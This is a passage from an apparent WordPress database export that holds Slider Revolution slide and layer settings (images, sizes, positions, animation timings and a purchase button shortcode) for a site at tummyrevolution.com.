To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"10\":{\"text\":\"Image 10\",\"alias\":\"Image 10\",\"uid\":10,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide2-graphic71.png\",\"imageId\":4609},\"size\":{\"width\":{\"d\":{\"v\":\"169px\",\"e\":true},\"n\":{\"v\":\"132px\",\"e\":true},\"t\":{\"v\":\"132px\",\"e\":true},\"m\":{\"v\":\"68px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"146px\",\"e\":true},\"n\":{\"v\":\"114px\",\"e\":true},\"t\":{\"v\":\"114px\",\"e\":true},\"m\":{\"v\":\"59px\",\"e\":true}},\"originalWidth\":169,\"originalHeight\":146,\"aspectRatio\":{\"d\":{\"v\":1.1575342465753424},\"n\":{\"v\":1.1575342465753424},\"t\":{\"v\":1.1575342465753424},\"m\":{\"v\":1.1575342465753424}}},\"position\":{\"x\":{\"d\":{\"v\":\"280px\",\"e\":true},\"n\":{\"v\":\"280px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"61px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"293px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":13,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"100%\"},\"n\":{\"v\":\"100%\"},\"t\":{\"v\":\"100%\"},\"m\":{\"v\":\"100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"100%\"},\"n\":{\"v\":\"100%\"},\"t\":{\"v\":\"100%\"},\"m\":{\"v\":\"100%\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.inOut\",\"speed\":900,\"start\":0}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"ease\":\"power2.inOut\",\"speed\":900,\"start\":0}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8100,\"endWithSlide\":true}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"11\":{\"text\":\"Image 11\",\"alias\":\"Image 11\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-slide2-graphic8.png\",\"imageId\":3454},\"size\":{\"width\":{\"d\":{\"v\":\"329px\",\"e\":true},\"n\":{\"v\":\"271px\",\"e\":true},\"t\":{\"v\":\"289px\",\"e\":true},\"m\":{\"v\":\"118px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"187px\",\"e\":true},\"n\":{\"v\":\"154px\",\"e\":true},\"t\":{\"v\":\"164px\",\"e\":true},\"m\":{\"v\":\"67px\",\"e\":true}},\"originalWidth\":329,\"originalHeight\":187,\"aspectRatio\":{\"d\":{\"v\":1.7593582887700534},\"n\":{\"v\":1.7593582887700534},\"t\":{\"v\":1.7593582887700534},\"m\":{\"v\":1.7593582887700534}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"588px\",\"e\":true},\"t\":{\"v\":\"-30px\",\"e\":true},\"m\":{\"v\":\"-25px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"270px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":14,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"100%\"},\"n\":{\"v\":\"100%\"},\"t\":{\"v\":\"100%\"},\"m\":{\"v\":\"100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"100%\"},\"n\":{\"v\":\"100%\"},\"t\":{\"v\":\"100%\"},\"m\":{\"v\":\"100%\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.inOut\",\"speed\":900,\"start\":0}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"ease\":\"power2.inOut\",\"speed\":900,\"start\":0}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8100,\"endWithSlide\":true}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"13\":{\"text\":\"[qodef_button size=\\\"medium\\\" text=\\\"purchase\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button size=\",\"uid\":13,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-15px\",\"e\":true},\"n\":{\"v\":\"-3px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"127px\",\"e\":true},\"n\":{\"v\":\"90px\",\"e\":true},\"t\":{\"v\":\"85px\",\"e\":true},\"m\":{\"v\":\"87px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":15,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":15,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(26,12,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"solid\",\"color\":\"#f7f7f7\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Image 1\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-cimet-img-71.png\",\"imageId\":4589},\"size\":{\"width\":{\"d\":{\"v\":\"186px\",\"e\":true},\"n\":{\"v\":\"158px\",\"e\":true},\"t\":{\"v\":\"164px\",\"e\":true},\"m\":{\"v\":\"94px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"394px\",\"e\":true},\"n\":{\"v\":\"333px\",\"e\":true},\"t\":{\"v\":\"347px\",\"e\":true},\"m\":{\"v\":\"198px\",\"e\":true}},\"originalWidth\":186,\"originalHeight\":394,\"aspectRatio\":{\"d\":{\"v\":0.4720812182741117},\"n\":{\"v\":0.4720812182741117},\"t\":{\"v\":0.4720812182741117},\"m\":{\"v\":0.4720812182741117}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-614px\",\"e\":true},\"t\":{\"v\":\"-16px\",\"e\":true},\"m\":{\"v\":\"-25px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"103px\",\"e\":true},\"t\":{\"v\":\"255px\",\"e\":true},\"m\":{\"v\":\"235px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim 